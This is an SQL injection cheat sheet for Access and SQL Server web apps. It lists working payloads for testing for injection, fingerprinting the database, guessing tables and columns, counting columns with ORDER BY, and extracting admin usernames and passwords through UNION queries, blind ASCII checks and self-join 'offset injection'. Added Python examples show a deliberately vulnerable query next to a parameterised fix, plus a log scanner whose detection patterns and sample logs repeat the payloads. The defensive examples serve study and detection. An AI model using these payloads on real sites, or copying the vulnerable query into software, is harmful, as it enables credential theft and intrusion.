1. Test whether an injection point exists
'
and 1=1
and 1=2
or 1=2
' and '1'='1
' and '1'='2
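Why the step-1 probes get a different answer for `'1'='1` and `'1'='2`, and what removes that difference: an added example written for this page, not code from the original cheat sheet. It uses Python's sqlite3 with a constructed in-memory `admin` table (the table and column names are assumed to match the page's `admin`/`password` naming); the vulnerable lookup concatenates the input into the SQL text, the hardened one binds it as a parameter.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the page's "admin" table (names assumed).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, admin TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO admin (admin, password) VALUES ('alice', 'secret')")
    conn.commit()
    return conn


def vulnerable_lookup(conn, username):
    # String concatenation: a quote in the input closes the literal and the
    # remainder is parsed as SQL, which is what the step-1 probes rely on.
    sql = "SELECT id FROM admin WHERE admin = '" + username + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, username):
    # Parameter binding: the input is passed as a value and never re-parsed,
    # so the quote and the trailing condition stay inside the string.
    sql = "SELECT id FROM admin WHERE admin = ?"
    return [row[0] for row in conn.execute(sql, (username,))]


def probe_responses(lookup):
    # Send the page's true/false pair through a lookup function and return
    # both result sets; a difference between them is the boolean oracle.
    conn = make_db()
    true_probe = "alice' and '1'='1"
    false_probe = "alice' and '1'='2"
    return lookup(conn, true_probe), lookup(conn, false_probe)


def is_injectable(lookup):
    # The page's step-1 test seen from the defender's side: the endpoint
    # leaks a boolean oracle when the two probes produce different answers.
    true_rows, false_rows = probe_responses(lookup)
    return true_rows != false_rows


if __name__ == "__main__":
    print("vulnerable:", probe_responses(vulnerable_lookup), is_injectable(vulnerable_lookup))
    print("safe:      ", probe_responses(safe_lookup), is_injectable(safe_lookup))
```

The concatenating version returns the row for the true probe and nothing for the false probe, which is exactly the yes/no channel every later step on this page (table checks, `len`, `asc(mid(...))`) is built on; with a bound parameter both probes look up a literal username that does not exist and the two answers are identical, so the channel is gone. Escaping quotes is not an equivalent fix, since the numeric-context probes (`and 1=1`) need no quote at all.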
2. Identify the database type
and exists (select * from msysobjects) > 0 //tests for Access
and exists (select * from sysobjects) > 0 //tests for SQL Server
3. Identify database tables
and exists (select * from admin) //tests whether an admin table exists
4. Identify column names
and exists (select password from admin) //tests whether the admin table has a password column
5. Determine the number of columns in the query
order by 10 //succeeds when the query returns 10 columns
6. Use a UNION query to retrieve the wanted values
and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
7. Retrieve the values of specific columns
and 1=2 union select 1,2,admin,4,password,6,7,8,9,10 from admin
Other queries:
1. Determine the length of the admin column value
and (select len(admin) from admin) = 5
and (select len(admin) from admin) > 5
2. Determine the length of the password column value
and (select len(password) from admin) = 5
3. Determine the ASCII value of the first character of the admin column
and (select top 1 asc(mid(admin,1,1)) from admin) > 100
4. Determine the ASCII value of the second character of the admin column
and (select top 1 asc(mid(admin,2,1)) from admin) > 100
5. Determine the ASCII value of the third character of the admin column
and (select top 1 asc(mid(admin,3,1)) from admin) > 100
Offset injection:
Mainly used when the table name can be guessed but the column names cannot.
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
1. Replace 22 with *
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin
2. Replace 21 with *
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin
3. Replace 20 with *
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin
4. Keep moving the * one column further forward each time until the query no longer errors.
5. Apply the formula
22-16=6 (22 columns in the query; the error stops at 16 constants, so the admin table has 6 columns)
10+6*2=22 (two self-joined copies of admin)
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4+6*3=22 (three self-joined copies of admin)
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
This dumps the values of the table's columns at whichever positions they land in, without needing their names.
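The same sequence from the detection side, covering steps 1 through 7, the character-by-character checks under "Other queries" and the offset-injection self-joins: an added example, not part of the original page. It scans web-server access-log lines (the lines, addresses and timestamps below are constructed for this example) for the probe shapes listed above after URL-decoding the query string; the signature names and the common-log-format layout are assumptions for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from any real system). The query
# strings carry the probe shapes listed on this page, URL-encoded as a
# browser would send them; the last line is a benign near-miss.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /news.asp?id=12 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /news.asp?id=12%20and%201=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /news.asp?id=12%20and%20exists%20(select%20*%20from%20msysobjects)%3E0 HTTP/1.1" 500 210
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /news.asp?id=12%20order%20by%2010 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /news.asp?id=12%20and%201=2%20union%20select%201,2,admin,4,password,6%20from%20admin HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /news.asp?id=12%20and%20(select%20top%201%20asc(mid(admin,1,1))%20from%20admin)%3E100 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:07 +0000] "GET /news.asp?id=12%20union%20select%201,2,a.id,b.id,*%20from%20(admin%20as%20a%20inner%20join%20admin%20as%20b%20on%20a.id=b.id) HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /search.asp?q=order%20form HTTP/1.1" 200 300
"""

# Common log format: ip ident user [time] "method target protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# One signature per stage of the page; names are assumed labels for this example.
SIGNATURES = [
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+'?\d+'?\s*=\s*'?\d+")),
    ("db-fingerprint", re.compile(r"\bfrom\s+(?:msysobjects|sysobjects)\b")),
    ("column-count-probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("union-extraction", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("blind-char-extraction", re.compile(r"\basc\s*\(\s*mid\s*\(|\blen\s*\(")),
    ("offset-injection", re.compile(r"\binner\s+join\s+\w+\s+as\s+\w+\b")),
]


def normalize_query(target):
    # Match on the decoded, lower-cased query string with whitespace collapsed,
    # so percent-encoding, '+' and inline-comment separators do not hide a probe.
    query = target.partition("?")[2]
    decoded = unquote_plus(query).lower().replace("/**/", " ")
    return re.sub(r"\s+", " ", decoded)


def classify(line):
    # Return (ip, status, [signature names]) for a parsed line, else None.
    m = LOG_RE.match(line)
    if not m:
        return None
    q = normalize_query(m.group("target"))
    tags = [name for name, rx in SIGNATURES if rx.search(q)]
    return m.group("ip"), m.group("status"), tags


def scan(log_text):
    # Return (line number, ip, tags) for every line that matched a signature.
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        result = classify(line)
        if result and result[2]:
            hits.append((n, result[0], result[2]))
    return hits


if __name__ == "__main__":
    for n, ip, tags in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(tags)}")
```

Two points worth carrying into a real rule set: decode before matching, because every probe on this page arrives percent-encoded, and keep the status code next to the hit, since the fingerprint and column-count stages are usually visible as a short run of 500s followed by a 200 from the same address once the attacker has found the working column count. The benign `q=order form` line is there to show that the `order by` signature needs the trailing digit to avoid matching ordinary search terms.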